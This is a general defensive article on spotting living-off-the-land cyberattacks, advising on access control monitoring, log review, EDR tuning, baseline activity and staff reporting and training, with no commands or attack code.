How To Detect Living-Off-The-Land (LOTL) Attacks

Cybercriminals always seek new ways to evade detection methods and infiltrate networks. What if they succeeded by blending into the environment, making it less likely for cybersecurity tools to detect them? That’s the concept behind living-off-the-land (LOTL) attacks. What should people know about them, and, more importantly, how can these threats be stopped? 

What Is a Living-Off-The-Land Attack?

A living-off-the-land attack occurs when cybercriminals exploit legitimate, existing tools and network features to gain access. Since infiltrators want to remain hidden for as long as possible, they usually do not rely on malicious code or software that an organization’s detection mechanisms would notice. 

Spotting LOTL Attacks

LOTL detection can be tricky because these attacks have no universally applicable or telltale signs. However, some things can still tip people off that they’re happening. 

Unusual Access Control Attempts

Cybercriminals need sufficient privileges to start doing damage after entering a system. If access control tools show strange patterns, such as people seemingly trying to change administrative settings without purpose, that’s a potential sign of a LOTL attack in progress. 

People should prevent this issue by staying aware of access control attempts. They should only permit individuals to use tools or parts of a system if they genuinely need them within the scope of their work. 

Strange Details in Network Logs 

Network logs can also hold the first clues of a LOTL attack in progress. However, that’s only true if they’re sufficiently detailed and allow people to differentiate between normal and suspicious activities. 

Plus, those responsible for checking the network logs must do so often enough to understand when a LOTL attack has happened or may have. One issue is that many cybersecurity teams only check the logs after attacks occur to learn what went wrong and why.

People should get in the habit of checking logs regularly enough to detect problems. This approach could be one of the most straightforward ways to detect a living-off-the-land attack. 

Information From an Endpoint Detection Response Tool

There’s often so much information related to a network environment that it’s challenging for cybersecurity teams to differentiate between the noise and legitimately concerning events. However, an endpoint detection response (EDR) tool can provide the necessary information to help them spot unusual events potentially connected to a LOTL attack. 

People should also tweak EDR automation features to flag them about specific events detected. LOTL attacks play out differently across companies. Still, the more familiar someone is with typical network activity, the easier it is to know what constitutes an anomaly. 

Certain tools are more vulnerable to exploitation than others. For example, more than 135 Microsoft-signed binaries and scripts are at risk of misuse. 

Establish What Constitutes Baseline Activity

Cybercriminals are becoming more sophisticated and creative with their attacks. Even so, the information gleaned by following these tips can help people compile information and see whether hacks are likely in progress. 

However, they should also use these insights in reverse. The best way is to use all available information to create an in-depth picture of the network's baseline activity. Use it to create triggers to alert people to abnormalities. They’ll then know it’s time to investigate further and hopefully stop attacks or prevent them from worsening. 

Cultivate Awareness Within the Organization

Although cybersecurity professionals may be the first to confirm a LOTL attack is in progress or has occurred, people throughout a company may notice some of its effects. A robust but easy-to-follow process for reporting unusual things is an excellent way to get everyone involved in detecting and curbing potential LOTL attacks. Even if the reporting individual does not directly halt the incident, the information they provide could be instrumental in steering the associated investigations.

One easy option is to have an internet-based form people can immediately go to and fill out when they’ve noticed something strange. If it only takes users a few seconds to complete the form, they'll find it easier to provide all the relevant information. However, a good proactive measure is having supplementary paper copies, especially if a cyberattack disrupts internet access. 

Another excellent way to raise awareness is to offer a training session that informs people about LOTL attacks and what makes them so hard to spot compared to other threats. Once employees know about them, they’ll be more likely to understand the importance of quickly reporting anything suspicious. 

Expect LOTL Attacks To Evolve

These suggestions will help people know what to look for when determining if a LOTL attack has happened or is in progress. However, all cybersecurity team members must understand that cyberattack methods characteristically change to make incidents harder to prevent. Being proactive by staying abreast of new approaches is one of the best ways to cope with this challenging reality.